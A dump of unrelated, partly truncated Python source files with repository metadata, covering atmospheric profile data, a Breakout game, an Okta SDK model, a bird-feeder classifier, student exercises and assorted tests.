"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | 1 | 2021-11-04T21:48:14.000Z | 2021-11-04T21:48:14.000Z | #############################################################################
#
# Author: Michel F. SANNER
#
# Copyright: M. Sanner and TSRI 2015
#
#########################################################################
#
# $Header: /mnt/raid/services/cvs/mglkeyDIST/mglkey/__init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
# $Id: __init__.py,v 1.1.1.1 2016/12/07 23:27:34 sanner Exp $
#
from mglkey import MGL_check_key
| 30.714286 | 106 | 0.448837 |
0cfc5802ff58618fd079fd5185d9edd8be7eda97 | 13,342 | py | Python | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T12:19:59.000Z | 2022-03-12T12:19:59.000Z | source/rttov_test/profile-datasets-py/div83/027.py | bucricket/projectMAScorrection | 89489026c8e247ec7c364e537798e766331fe569 | [
"BSD-3-Clause"
] | null | null | null | """
Profile ../profile-datasets-py/div83/027.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/027.py"
self["Q"] = numpy.array([ 1.51831800e+00, 2.02599600e+00, 2.94787100e+00,
3.99669400e+00, 4.71653800e+00, 4.89106600e+00,
5.14399400e+00, 5.67274800e+00, 6.02338400e+00,
6.09836300e+00, 6.08376300e+00, 6.01126400e+00,
5.91866500e+00, 5.77584700e+00, 5.59481900e+00,
5.41637100e+00, 5.26750200e+00, 5.10689400e+00,
4.98576500e+00, 4.90039600e+00, 4.80689700e+00,
4.63989800e+00, 4.46443000e+00, 4.30135100e+00,
4.16606300e+00, 4.06766300e+00, 4.01361400e+00,
3.95640400e+00, 3.87825500e+00, 3.79394600e+00,
3.73623600e+00, 3.72919600e+00, 3.74067600e+00,
3.78187600e+00, 3.81900500e+00, 3.85233500e+00,
3.88512500e+00, 3.91148500e+00, 3.92466500e+00,
3.92849500e+00, 3.93905400e+00, 3.97355400e+00,
4.02951400e+00, 4.05710400e+00, 4.04558400e+00,
4.02228400e+00, 4.01040400e+00, 4.00572400e+00,
4.00641400e+00, 4.08608300e+00, 4.44130000e+00,
5.00126500e+00, 5.73600700e+00, 6.83860300e+00,
8.34002000e+00, 9.95999100e+00, 1.13537700e+01,
1.24435500e+01, 1.36048100e+01, 1.55239600e+01,
1.77784800e+01, 1.93991200e+01, 2.00516000e+01,
1.97941100e+01, 1.89638400e+01, 1.84148600e+01,
1.82331700e+01, 1.84861600e+01, 2.02668900e+01,
3.24805400e+01, 6.31028200e+01, 1.09865900e+02,
1.71694500e+02, 2.41407700e+02, 3.05073900e+02,
3.60772800e+02, 4.04902000e+02, 4.16543400e+02,
4.04623200e+02, 3.59892400e+02, 3.06567000e+02,
3.03443900e+02, 4.25764600e+02, 8.75110500e+02,
1.60701300e+03, 2.52645100e+03, 3.50894400e+03,
4.39830900e+03, 5.05090900e+03, 5.40195000e+03,
5.54486300e+03, 5.86218200e+03, 6.10752900e+03,
6.83105600e+03, 6.63557500e+03, 6.44820100e+03,
6.26853800e+03, 6.09616900e+03, 5.93072700e+03,
5.77187200e+03, 5.61926500e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.9234, 375.9232, 375.9219, 375.9195, 375.9172, 375.9142,
375.9041, 375.8819, 375.8607, 375.8617, 375.8997, 375.9717,
376.0398, 376.0858, 376.1489, 376.212 , 376.224 , 376.2321,
376.2481, 376.2772, 376.3252, 376.3663, 376.4023, 376.4224,
376.4504, 376.4865, 376.5545, 376.6335, 376.7605, 376.8966,
377.0446, 377.2036, 377.3766, 377.5606, 377.7106, 377.8485,
378.0765, 378.4945, 378.9365, 379.6475, 380.4225, 381.0245,
381.4085, 381.8025, 381.8315, 381.8625, 381.8985, 381.9405,
381.9845, 382.0364, 382.0903, 382.5651, 383.1618, 383.8894,
384.7668, 385.5962, 386.1156, 386.6532, 386.7607, 386.854 ,
386.8701, 386.8645, 386.8732, 386.8913, 386.9157, 386.9449,
386.9669, 386.9788, 386.9602, 386.9034, 386.8186, 386.7075,
386.6086, 386.5187, 386.4681, 386.4315, 386.4595, 386.5189,
386.6375, 386.8447, 387.1073, 387.3124, 387.433 , 387.3937,
387.2297, 386.9659, 386.6525, 386.3522, 386.1188, 385.9826,
385.9361, 385.8209, 385.7317, 385.4548, 385.5337, 385.6074,
385.6771, 385.744 , 385.8082, 385.8699, 385.9291])
self["CO"] = numpy.array([ 0.2205447 , 0.2185316 , 0.2145434 , 0.2078282 , 0.1977631 ,
0.1839901 , 0.1511932 , 0.09891954, 0.0827345 , 0.05454007,
0.02926452, 0.01534331, 0.01021024, 0.00922827, 0.00895567,
0.00841368, 0.00791632, 0.0076217 , 0.00749041, 0.00745301,
0.00740799, 0.00741502, 0.00746624, 0.00760092, 0.00775626,
0.00793258, 0.0081303 , 0.00834271, 0.00844155, 0.00854593,
0.00861921, 0.00869836, 0.00895125, 0.009236 , 0.00956421,
0.00993273, 0.01050776, 0.01155325, 0.01277055, 0.01483604,
0.01745463, 0.02009092, 0.02248201, 0.0252159 , 0.0250677 ,
0.0249136 , 0.0248554 , 0.0248671 , 0.0248747 , 0.0248604 ,
0.02484549, 0.02830606, 0.03349511, 0.03954063, 0.04649641,
0.05393566, 0.05777834, 0.06203953, 0.06291754, 0.06367061,
0.06376177, 0.06365417, 0.06355173, 0.06345124, 0.063449 ,
0.06353453, 0.06376724, 0.06416551, 0.06445159, 0.0646028 ,
0.06451203, 0.06417925, 0.06369376, 0.06310236, 0.06261609,
0.06216137, 0.06196 , 0.06180874, 0.06178709, 0.06208905,
0.06263239, 0.06350083, 0.06423774, 0.06476787, 0.06481747,
0.06471838, 0.06458966, 0.06447546, 0.06438733, 0.06432344,
0.06428367, 0.06423741, 0.0641983 , 0.06589368, 0.07015209,
0.07475692, 0.0797395 , 0.08513432, 0.09097941, 0.09731644,
0.1041912 ])
self["T"] = numpy.array([ 189.265, 197.336, 211.688, 227.871, 242.446, 252.765,
259.432, 262.908, 263.411, 262.202, 261.422, 259.368,
255.095, 250.075, 244.792, 239.205, 235.817, 231.46 ,
227.966, 225.935, 225.115, 222.382, 219.723, 218.152,
217.875, 218.211, 218.288, 218.294, 217.949, 217.202,
216.158, 214.964, 215.259, 215.053, 215.409, 216.081,
216.441, 216.152, 215.427, 215.082, 216.198, 217.247,
217.006, 216.373, 216.342, 217.088, 218.419, 219.839,
220.797, 220.946, 221.423, 222.504, 223.822, 225.134,
226.221, 226.93 , 227.275, 227.405, 227.434, 227.346,
227.212, 227.246, 227.566, 228.2 , 229.083, 230.094,
231.117, 232.121, 233.086, 234.01 , 235.064, 236.351,
237.928, 239.892, 242.039, 244.306, 246.651, 249.025,
251.415, 253.802, 256.16 , 258.448, 260.591, 262.445,
264.071, 265.349, 266.233, 266.969, 267.78 , 268.72 ,
269.42 , 270.502, 271.421, 273.317, 273.317, 273.317,
273.317, 273.317, 273.317, 273.317, 273.317])
self["N2O"] = numpy.array([ 0.00161 , 0.00187 , 0.00205999, 0.00220999, 0.00233999,
0.00235999, 0.00157999, 0.00186999, 0.00519997, 0.00870995,
0.00838995, 0.00955994, 0.01208993, 0.01432992, 0.0171399 ,
0.02172988, 0.02788985, 0.03756981, 0.04630977, 0.05168975,
0.05680973, 0.05922973, 0.06028973, 0.06131974, 0.07010971,
0.07957968, 0.08867964, 0.09929961, 0.1101496 , 0.1206295 ,
0.1301795 , 0.1371795 , 0.1439595 , 0.1505294 , 0.1651494 ,
0.1848693 , 0.2034792 , 0.2285391 , 0.252299 , 0.2748389 ,
0.2840589 , 0.2926288 , 0.3004188 , 0.3072488 , 0.3129187 ,
0.3172487 , 0.3200187 , 0.3209987 , 0.3209987 , 0.3209987 ,
0.3209986 , 0.3209984 , 0.3209982 , 0.3209978 , 0.3209973 ,
0.3209968 , 0.3209964 , 0.320996 , 0.3209956 , 0.320995 ,
0.3209943 , 0.3209938 , 0.3209936 , 0.3209936 , 0.3209939 ,
0.3209941 , 0.3209941 , 0.3209941 , 0.3209935 , 0.3209896 ,
0.3209797 , 0.3209647 , 0.3209449 , 0.3209225 , 0.3209021 ,
0.3208842 , 0.32087 , 0.3208663 , 0.3208701 , 0.3208845 ,
0.3209016 , 0.3209026 , 0.3208633 , 0.3207191 , 0.3204841 ,
0.320189 , 0.3198736 , 0.3195881 , 0.3193787 , 0.319266 ,
0.3192201 , 0.3191182 , 0.3190395 , 0.3188072 , 0.31887 ,
0.3189301 , 0.3189878 , 0.3190431 , 0.3190962 , 0.3191472 ,
0.3191962 ])
self["O3"] = numpy.array([ 0.1903137 , 0.2192386 , 0.3077081 , 0.5440408 , 0.8590299 ,
1.170854 , 1.499102 , 1.864289 , 2.273556 , 2.805293 ,
3.409769 , 4.028786 , 4.806182 , 5.619898 , 6.411164 ,
7.147361 , 7.51202 , 7.648961 , 7.644362 , 7.556123 ,
7.446574 , 7.281136 , 6.952659 , 6.604492 , 6.296854 ,
6.008776 , 5.751387 , 5.520268 , 5.311749 , 5.111921 ,
4.890092 , 4.593293 , 4.298724 , 3.882905 , 3.380027 ,
2.799559 , 2.288161 , 2.031152 , 2.018272 , 2.047542 ,
1.969722 , 1.685453 , 1.220825 , 0.9176053 , 0.8929574 ,
0.9542592 , 1.004996 , 1.034796 , 1.031726 , 1.019046 ,
0.8797071 , 0.6484178 , 0.4105526 , 0.2529783 , 0.1943934 ,
0.201197 , 0.2459162 , 0.322179 , 0.3977806 , 0.4292413 ,
0.4255834 , 0.3930204 , 0.3461121 , 0.2989281 , 0.2606191 ,
0.2321107 , 0.2069452 , 0.1838146 , 0.1618567 , 0.1410414 ,
0.1225313 , 0.1061913 , 0.09214328, 0.08133816, 0.07293074,
0.06636085, 0.06143102, 0.05859298, 0.05740586, 0.05732126,
0.05783027, 0.05809797, 0.05651443, 0.05019414, 0.0404447 ,
0.03280082, 0.02944741, 0.02902179, 0.02945348, 0.02918976,
0.02836743, 0.02750451, 0.02608958, 0.02225294, 0.02225732,
0.02226152, 0.02226555, 0.02226941, 0.02227312, 0.02227668,
0.02228009])
self["CH4"] = numpy.array([ 0.1059488, 0.1201298, 0.1306706, 0.1417254, 0.1691352,
0.209023 , 0.2345078, 0.2578465, 0.2845033, 0.328699 ,
0.3987896, 0.4800421, 0.5668716, 0.6510682, 0.7280449,
0.7954147, 0.8518465, 0.8903115, 0.9281374, 0.9731752,
1.016085 , 1.071595 , 1.131985 , 1.189835 , 1.247015 ,
1.302185 , 1.355285 , 1.400504 , 1.442154 , 1.464494 ,
1.488464 , 1.514124 , 1.541544 , 1.560774 , 1.579304 ,
1.596804 , 1.612894 , 1.627174 , 1.638294 , 1.650024 ,
1.662373 , 1.675353 , 1.688973 , 1.722213 , 1.729283 ,
1.736683 , 1.741733 , 1.745103 , 1.749093 , 1.755483 ,
1.762122 , 1.770021 , 1.77847 , 1.785498 , 1.790785 ,
1.795642 , 1.79793 , 1.800308 , 1.800506 , 1.800632 ,
1.800498 , 1.800295 , 1.800414 , 1.800704 , 1.800856 ,
1.800867 , 1.800517 , 1.799787 , 1.798434 , 1.796372 ,
1.794017 , 1.791393 , 1.789133 , 1.787118 , 1.785875 ,
1.784886 , 1.784827 , 1.785476 , 1.788046 , 1.791395 ,
1.795229 , 1.798224 , 1.800263 , 1.801052 , 1.800931 ,
1.80036 , 1.799234 , 1.797877 , 1.796739 , 1.796035 ,
1.795827 , 1.795294 , 1.79488 , 1.793604 , 1.793966 ,
1.794315 , 1.794639 , 1.794951 , 1.795249 , 1.795536 ,
1.795812 ])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 273.317
self["S2M"]["Q"] = 5619.26541873
self["S2M"]["O"] = 0.022280094739
self["S2M"]["P"] = 905.85559
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 0
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 273.317
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = 45.309
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([2007, 4, 1])
self["TIME"] = numpy.array([0, 0, 0])
| 57.508621 | 92 | 0.570979 |
0cfdd69003365202954e59ba474c596cdd274c91 | 10,386 | py | Python | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | stanCode_Projects/break_out_game/breakoutgraphics.py | kunyi1022/sc-projects | 0ab0019b2cdc86c434a0acff39b862263dcbc970 | [
"MIT"
] | null | null | null | """
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
File: breakoutgraphics.py
Name: Jordan
-------------------------
This python file will create a class named BreakoutGraphics for the break out game.
This class will contain the building block for creating that game.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
| 39.192453 | 134 | 0.604756 |
0cfe0c2510332685f3cc3783752192ba32a124ab | 329 | py | Python | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | PythonExercicios/ex020.py | github-felipe/ExerciciosEmPython-cursoemvideo | 0045464a287f21b6245554a975588cf06c5b476d | [
"MIT"
] | null | null | null | from random import shuffle
a1 = str(input('Digite o nome de um aluno: '))
a2 = str(input('Digite o nome de outro aluno: '))
a3 = str(input('Digite o nome de mais outro aluno: '))
a4 = str(input('Digite o nome do ltimo aluno: '))
lista = [a1, a2, a3, a4]
shuffle(lista)
print(f'A ordem de apresentao : \033[34m{lista}\033[m')
| 36.555556 | 58 | 0.680851 |
4901c51c1ea8530e44c195ecd1215f420a39da2d | 3,940 | py | Python | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | okta/models/profile_enrollment_policy_rule_action.py | ander501/okta-sdk-python | 0927dc6a2f6d5ebf7cd1ea806d81065094c92471 | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
"""
Copyright 2021 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from okta.okta_object import OktaObject
from okta.okta_collection import OktaCollection
from okta.models import profile_enrollment_policy_rule_activation_requirement\
as profile_enrollment_policy_rule_activation_requirement
from okta.models import pre_registration_inline_hook\
as pre_registration_inline_hook
from okta.models import profile_enrollment_policy_rule_profile_attribute\
as profile_enrollment_policy_rule_profile_attribute
| 42.826087 | 154 | 0.679949 |
490301996f235103083f9f733d639e25da1a8a52 | 1,478 | py | Python | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | null | null | null | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | 3 | 2019-05-02T12:49:21.000Z | 2019-06-12T09:11:00.000Z | test/test_compression.py | Peter42/iasi | fc799d542c2bb80c3f559bc2f9e833ac330a5506 | [
"MIT"
] | 1 | 2019-10-18T21:33:33.000Z | 2019-10-18T21:33:33.000Z | import datetime
import unittest
import luigi
import numpy as np
from netCDF4 import Dataset
from iasi.compression import (CompressDataset, CompressDateRange,
DecompressDataset)
| 30.791667 | 95 | 0.614344 |
4905009d57cff19e66575a7bfdba66a5dbebafe6 | 6,310 | py | Python | bird_classify.py | google-coral/project-birdfeeder | 3bcb9bfd4123a0c6f16a09087a8ccdfe0c6dd80e | [
"Apache-2.0"
] | 26 | 2019-07-23T22:32:08.000Z | 2022-01-09T15:15:50.000Z | bird_classify.py | hjonnala/project-birdfeeder | 4375a9370d7567b756b6cc68f4dfcb4c8183b118 | [
"Apache-2.0"
] | 13 | 2019-07-26T17:10:48.000Z | 2022-03-01T04:11:48.000Z | bird_classify.py | hjonnala/project-birdfeeder | 4375a9370d7567b756b6cc68f4dfcb4c8183b118 | [
"Apache-2.0"
] | 19 | 2019-11-05T03:01:31.000Z | 2022-03-29T01:13:46.000Z | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python3
"""
Coral Smart Bird Feeder
Uses ClassificationEngine from the EdgeTPU API to analyze animals in
camera frames. Sounds a deterrent if a squirrel is detected.
Users define model, labels file, storage path, deterrent sound, and
optionally can set this to training mode for collecting images for a custom
model.
"""
import argparse
import time
import logging
from PIL import Image
from playsound import playsound
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import make_interpreter
from pycoral.adapters import common
from pycoral.adapters.classify import get_classes
import gstreamer
def save_data(image, results, path, ext='png'):
"""Saves camera frame and model inference results
to user-defined storage directory."""
tag = '%010d' % int(time.monotonic()*1000)
name = '%s/img-%s.%s' % (path, tag, ext)
image.save(name)
print('Frame saved as: %s' % name)
logging.info('Image: %s Results: %s', tag, results)
def print_results(start_time, last_time, end_time, results):
"""Print results to terminal for debugging."""
inference_rate = ((end_time - start_time) * 1000)
fps = (1.0/(end_time - last_time))
print('\nInference: %.2f ms, FPS: %.2f fps' % (inference_rate, fps))
for label, score in results:
print(' %s, score=%.2f' % (label, score))
def do_training(results, last_results, top_k):
"""Compares current model results to previous results and returns
true if at least one label difference is detected. Used to collect
images for training a custom model."""
new_labels = [label[0] for label in results]
old_labels = [label[0] for label in last_results]
shared_labels = set(new_labels).intersection(old_labels)
if len(shared_labels) < top_k:
print('Difference detected')
return True
return False
def main():
"""Creates camera pipeline, and pushes pipeline through ClassificationEngine
model. Logs results to user-defined storage. Runs either in training mode to
gather images for custom model creation or in deterrent mode that sounds an
'alarm' if a defined label is detected."""
args = user_selections()
print("Loading %s with %s labels." % (args.model, args.labels))
interpreter = make_interpreter(args.model)
interpreter.allocate_tensors()
labels = read_label_file(args.labels)
input_tensor_shape = interpreter.get_input_details()[0]['shape']
if (input_tensor_shape.size != 4 or
input_tensor_shape[0] != 1):
raise RuntimeError(
'Invalid input tensor shape! Expected: [1, height, width, channel]')
output_tensors = len(interpreter.get_output_details())
if output_tensors != 1:
raise ValueError(
('Classification model should have 1 output tensor only!'
'This model has {}.'.format(output_tensors)))
storage_dir = args.storage
# Initialize logging file
logging.basicConfig(filename='%s/results.log' % storage_dir,
format='%(asctime)s-%(message)s',
level=logging.DEBUG)
last_time = time.monotonic()
last_results = [('label', 0)]
gstreamer.run_pipeline(user_callback, videosrc=args.videosrc)
if __name__ == '__main__':
FOX_SQUIRREL_LABEL = 'fox squirrel, eastern fox squirrel, Sciurus niger'
main()
| 38.711656 | 94 | 0.666878 |
4906781740f98be4911b2335a3c4e24bb2089146 | 2,959 | py | Python | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 789 | 2016-09-05T04:14:25.000Z | 2022-03-30T09:51:54.000Z | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 5,724 | 2016-08-29T18:58:40.000Z | 2022-03-31T23:49:42.000Z | memory/test/test_memory.py | MaxGreil/hail | 4e0605b6bfd24a885a8194e8c0984b20994d3407 | [
"MIT"
] | 233 | 2016-08-31T20:42:38.000Z | 2022-02-17T16:42:39.000Z | import unittest
import uuid
from memory.client import MemoryClient
from hailtop.aiocloud.aiogoogle import GoogleStorageAsyncFS
from hailtop.config import get_user_config
from hailtop.utils import async_to_blocking
from gear.cloud_config import get_gcp_config
PROJECT = get_gcp_config().project
| 36.085366 | 111 | 0.663738 |
49078fb3338a8d88957f2187faa7b3d0420743af | 990 | py | Python | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | # feladat.py
# 1. feladat
# rjon fggvnyt szokoev_e nven
# A fggvny trjen vissza igaz rtkkel, ha a paramterben megadott vszm szkv
# 2. feladat
# A fggvny bemen paramterei az a, b, c egsz szmok
# rjon kdot amely eredmnyeknt az a vltozba lesz a legnagyobb szm, a b vltozba a msodik legnagyobb szm s a c vltozba pedig a legkisebb szm.
# 3. feladat
# Ksztsen palindrom-e nev fggvnyt amely egy stringrl megllaptja, hogy palidrom-e
# Tgabb rtelembe a palindrom olyan szveg vagy szkapcsolat, amely visszafel olvasva is ugyanaz
# 4. feladat
# rjon fggvnyt amely meghatrozza, hogy egy adott intervallumban hny ngyzetszm van
# Pl. [1-9] intervallum esetn 1, 2, 3 ngyzetei esnek, teht hrom ngyzetszm van
| 28.285714 | 153 | 0.756566 |
0b2242c98f153e44bcbb14ec8721042c75e0511e | 76 | py | Python | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | 1 | 2018-04-02T15:38:10.000Z | 2018-04-02T15:38:10.000Z | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | null | null | null | bin/pymodules/objectedit/__init__.py | mattire/naali | 28c9cdc84c6a85e0151a222e55ae35c9403f0212 | [
"Apache-2.0"
] | null | null | null | #from editgui import EditGUI
#from only_layout import OnlyLayout as EditGUI
| 25.333333 | 46 | 0.842105 |
0b24417f2ee0b6b95e1c21f1f50ee2435fb6de2e | 1,210 | py | Python | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 133 | 2018-05-18T13:54:10.000Z | 2022-02-15T02:14:20.000Z | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 68 | 2018-06-03T16:42:09.000Z | 2021-01-29T10:58:30.000Z | audiomate/processing/pipeline/onset.py | CostanzoPablo/audiomate | 080402eadaa81f77f64c8680510a2de64bc18e74 | [
"MIT"
] | 37 | 2018-11-02T02:40:29.000Z | 2021-11-30T07:44:50.000Z | import librosa
import numpy as np
from . import base
from . import spectral
| 31.025641 | 104 | 0.686777 |
0b24c9c12856cb1232066c7941cc8a2db9d6f09f | 2,496 | py | Python | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | friction_ramp_analysis/classes/callForceRampGUI.py | JSotres/AFM-Friction-Ramp-Analysis | d663134f148575f09e2991186c991ed00598ab5e | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog
import sys
from .readNanoscopeForceRamps import *
import matplotlib.pyplot as plt
from ..qt5_ui_files.ForceRampGUI import *
from matplotlib.backends.backend_qt5agg import (NavigationToolbar2QT as NavigationToolbar)
import os
import math
from ..qt5_ui_files.mplwidget1plot import mplwidget1plot
| 35.657143 | 105 | 0.733574 |
0b28b47566a0388433df755a312dddf760b4c430 | 1,250 | py | Python | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | null | null | null | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | 43 | 2022-02-07T00:18:35.000Z | 2022-03-21T04:42:48.000Z | onebarangay_psql/users/tests/test_admin.py | PrynsTag/oneBarangay-PostgreSQL | 11d7b97b57603f4c88948905560a22a5314409ce | [
"Apache-2.0"
] | null | null | null | """Create your tests for the admin app here."""
import pytest
from django.contrib.auth import get_user_model
from django.urls import reverse
pytestmark = pytest.mark.django_db
User = get_user_model()
| 33.783784 | 79 | 0.668 |
0b296cbeff42f183e0f9446e0c1d52f582289ecd | 1,129 | py | Python | neuroscout/resources/dataset.py | jdkent/neuroscout | 67aaafdf883988e2048197dc9ce4559a28e3b7b6 | [
"BSD-3-Clause"
